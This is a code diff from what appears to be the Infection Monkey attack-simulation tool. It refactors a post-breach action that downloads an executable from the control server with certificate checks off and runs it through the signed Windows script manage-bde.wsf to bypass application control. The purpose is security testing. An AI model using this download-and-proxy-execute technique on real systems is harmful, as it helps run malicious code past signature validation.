diff --git a/monkey/common/data/api_url_consts.py b/monkey/common/data/api_url_consts.py new file mode 100644 index 000000000..4fef6b11b --- /dev/null +++ b/monkey/common/data/api_url_consts.py @@ -0,0 +1 @@ +T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download' diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 22856ee3c..35922286f 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -2,12 +2,14 @@ import json import logging import platform from socket import gethostname +from urllib.parse import urljoin import requests from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from infection_monkey.config import GUID, WormConfiguration from infection_monkey.network.info import check_internet_access, local_ips from infection_monkey.transport.http import HTTPConnectProxy @@ -328,7 +330,8 @@ class ControlClient(object): @staticmethod def get_T1216_pba_file(): try: - return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123 + return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123 + T1216_PBA_FILE_DOWNLOAD_PATH), verify=False, proxies=ControlClient.proxies, stream=True) diff --git a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py index 73a3a8559..17eb86337 100644 --- a/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py +++ b/monkey/infection_monkey/post_breach/actions/use_signed_scripts.py @@ -1,3 +1,4 @@ +import logging import subprocess from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC @@ -6,6 +7,8 @@ from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import cleanup_changes, get_commands_to_proxy_execution_using_signed_script) from infection_monkey.utils.environment import is_windows_os +LOG = logging.getLogger(__name__) + class SignedScriptProxyExecution(PBA): def __init__(self): @@ -14,11 +17,14 @@ class SignedScriptProxyExecution(PBA): windows_cmd=' '.join(windows_cmds)) def run(self): - original_comspec = '' - if is_windows_os(): - original_comspec =\ - subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 + try: + original_comspec = '' + if is_windows_os(): + original_comspec =\ + subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116 - super().run() - - cleanup_changes(original_comspec) + super().run() + except Exception as e: + LOG.warning(f"An exception occurred on running PBA {POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC}: {str(e)}") + finally: + cleanup_changes(original_comspec) diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index 1e06f453e..6cdf5fe01 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -1,5 +1,4 @@ import os -import subprocess from infection_monkey.control import ControlClient @@ -8,11 +7,11 @@ TEMP_COMSPEC = os.path.join(os.getcwd(), 'random_executable.exe') def get_windows_commands_to_proxy_execution_using_signed_script(): download = ControlClient.get_T1216_pba_file() - with open(TEMP_COMSPEC, 'wb') as file_obj: - file_obj.write(download.content) - file_obj.flush() + with open(TEMP_COMSPEC, 'wb') as random_exe_obj: + random_exe_obj.write(download.content) + random_exe_obj.flush() - windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116 + windir_path = os.environ['WINDIR'] signed_script = os.path.join(windir_path, 'System32', 'manage-bde.wsf') return [ diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 31b534b3a..e8dfd2cfc 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -6,6 +6,7 @@ from flask import Flask, Response, send_from_directory from werkzeug.exceptions import NotFound import monkey_island.cc.environment.environment_singleton as env_singleton +from common.data.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.database import database, mongo from monkey_island.cc.resources.attack.attack_config import AttackConfiguration @@ -132,7 +133,7 @@ def init_api_resources(api): api.add_resource(Log, '/api/log', '/api/log/') api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/') api.add_resource(PBAFileDownload, '/api/pba/download/') - api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/') + api.add_resource(T1216PBAFileDownload, T1216_PBA_FILE_DOWNLOAD_PATH) api.add_resource(FileUpload, '/api/fileUpload/', '/api/fileUpload/?load=', '/api/fileUpload/?restore=') diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py index 92c09352f..d4efbd73e 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1216.py @@ -8,8 +8,14 @@ __author__ = "shreyamalviya" class T1216(PostBreachTechnique): tech_id = "T1216" unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\ - "pre-existing signed script since it didn't run on any Windows machines." + "pre-existing signed script since it didn't run on any Windows machines. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\ - "pre-existing signed script on Windows but failed." - used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows." + "pre-existing signed script on Windows but failed. " +\ + "If successful, this behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." + used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows. " +\ + "This behavior could be abused by adversaries to execute malicious files that could " +\ + "bypass application control and signature validation on systems." pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]